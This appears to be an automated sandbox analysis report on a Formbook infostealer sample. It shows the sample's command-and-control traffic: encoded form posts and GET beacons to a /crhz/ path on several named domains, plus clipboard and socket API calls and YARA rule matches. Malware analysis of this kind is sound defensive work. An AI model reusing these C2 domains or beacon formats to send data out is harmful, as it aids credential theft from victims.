          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 32 72 30 79 6f 61 41 38 4e 39 7e 63 71 74 52 65 33 58 68 6c 70 6b 4b 73 71 4e 4b 58 6e 38 70 5f 35 61 4a 7a 57 76 6b 55 6c 46 71 35 36 76 71 39 6e 33 30 7a 74 75 70 50 4d 47 59 53 53 59 55 75 70 36 31 75 63 42 78 39 32 6b 4a 5f 69 41 56 66 4f 79 77 76 38 47 45 64 37 6b 52 37 59 58 30 37 31 32 56 75 4b 48 65 72 5a 44 36 74 63 30 55 4b 56 51 4b 67 78 68 37 38 69 6f 39 36 53 31 52 48 42 56 61 68 70 6d 30 79 36 4b 31 31 4a 65 55 78 37 59 76 48 34 61 74 4b 5a 62 6d 62 62 64 66 4c 6e 6e 64 63 50 6b 35 58 37 32 63 63 43 4b 76 47 28 37 71 62 4f 50 44 70 38 52 51 36 55 53 49 31 59 47 53 2d 7a 46 56 30 43 56 6d 66 67 73 54 59 31 61 71 5f 44 4b 6b 6c 42 6a 54 75 6c 4e 55 51 33 51 34 63 38 76 63 51 41 33 47 71 73 66 46 43 7a 49 47 31 37 56 4f 68 48 4e 73 4f 4b 72 4e 79 76 6c 7e 4b 35 64 4c 63 33 57 66 70 66 6d 35 5a 52 48 28 75 46 72 39 77 38 48 51 69 36 58 4d 41 58 2d 4f 77 49 4a 6d 33 5a 79 67 53 43 6a 49 64 47 63 37 5f 63 52 57 36 78 4c 70 47 47 49 52 4e 61 35 69 51 76 41 73 58 57 65 56 5a 4a 76 71 71 34 75 6c 30 59 34 64 31 74 41 4d 31 30 39 45 33 64 72 68 30 68 53 45 49 51 64 4c 31 36 62 70 36 68 5f 64 61 6c 43 7e 76 47 70 28 6d 6b 6e 37 7a 7e 5a 38 33 4c 47 6e 49 66 55 4b 65 6a 37 46 6e 77 75 5a 4a 44 77 64 47 49 4e 6d 47 72 62 31 6c 57 47 77 49 7e 77 5a 2d 6f 6e 76 54 32 5a 68 53 76 63 48 2d 
7a 4c 77 4d 57 6d 62 42 4d 55 36 5a 6b 36 49 36 6e 56 5a 73 36 46 73 4a 76 70 38 6e 64 5f 57 62 37 79 53 73 4c 65 30 74 72 76 39 42 6b 62 32 4f 41 53 5a 57 41 4c 28 49 4d 6f 51 37 66 32 4d 63 69 71 63 37 59 72 7a 71 38 67 78 65 34 46 4a 66 36 76 47 54 41 42 7a 61 57 43 58 44 45 42 6f 36 77 4a 34 58 6e 33 37 6c 56 35 37 49 56 47 67 55 75 37 4a 50 30 51 48 6f 54 6f 32 53 6d 61 35 53 4b 46 74 55 67 38 6e 73 7e 64 62 38 36 2d 70 7a 39 78 7e 51 34 71 58 77 49 78 31 61 67 37 47 4c 68 37 4b 57 47 42 4a 76 4f 31 32 54 39 72 78 77 39 69 41 6e 4d 41 46 35 4f 30 6a 36 71 71 6b 4a 33 6c 4d 2d 44 68 61 71 61 68 41 4e 38 77 72 4f 36 31 77 55 6a 64 37 4f 4b 58 69 70 56 74 35 57 6f 44 43 53 6a 50 51 68 28 79 6e 73 57 4b 67 61 43 67 73 54 78 6f 41 42 53 49 4b 79 4c 72 7a 73 4e 42 66 61 73 65 31 61 57 4c 62 72 6b 34 57 49 62 2d 50 77 67 43 76 71 37 4e 36 48 56 56 41 55 78 51 65 61 5a 49 51 6a 6b 56 68 5f 28 6e 45 32 4b 53 51 75 77 50 38 65 61 53 33 30 37 4f 6c 67 74 75 30 63 67 6f 50 74 30 66 35 44 4d 63 44 74 41 7a 6b 4b 69 58 49 66 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.teammart.onlineConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.teammart.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teammart.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 4b 61 67 70 79 6a 57 47 64 54 32 7a 49 74 39 54 6e 41 70 63 6c 70 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.teammart.online Connection: close Content-Length: 1455 Cache-Control: no-cache Origin: http://www.teammart.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.teammart.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 191 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 1455 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 191 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 1455 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 191 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 1455 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.mitsubangsaen.online Connection: close Content-Length: 191 Cache-Control: no-cache Origin: http://www.mitsubangsaen.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mitsubangsaen.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.mitsubangsaen.online Connection: close Content-Length: 1455 Cache-Control: no-cache Origin: http://www.mitsubangsaen.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mitsubangsaen.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 30 Jan 2023 13:52:04 GMT Content-Type: text/html Content-Length: 146 Connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 30 Jan 2023 13:52:26 GMT Content-Type: text/html Content-Length: 146 Connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 30 Jan 2023 13:52:28 GMT Content-Type: text/html Content-Length: 146 Connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 30 Jan 2023 13:52:32 GMT Content-Type: text/html Content-Length: 146 Connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:52:48 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:52:51 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:52:54 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html; charset=utf-8
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/" content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked date: Mon, 30 Jan 2023 13:53:00 GMT server: LiteSpeed connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/" content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked date: Mon, 30 Jan 2023 13:53:02 GMT server: LiteSpeed connection: close
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:53:21 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:53:24 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 30 Jan 2023 13:53:26 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Mon, 30 Jan 2023 13:53:32 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Mon, 30 Jan 2023 13:53:35 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Mon, 30 Jan 2023 13:53:38 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: unknown HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.n-r-eng.com Connection: close Content-Length: 191 Cache-Control: no-cache Origin: http://www.n-r-eng.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.n-r-eng.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
          Source: unknown DNS traffic detected: queries for: www.laylaroseuk.com
          Source: C:\Windows\explorer.exe Code function: 3_2_05AA74F2 getaddrinfo,SleepEx,setsockopt,recv,recv,3_2_05AA74F2
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.n-r-eng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA0E22 OpenClipboard,3_2_05AA0E22

          E-Banking Fraud

          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
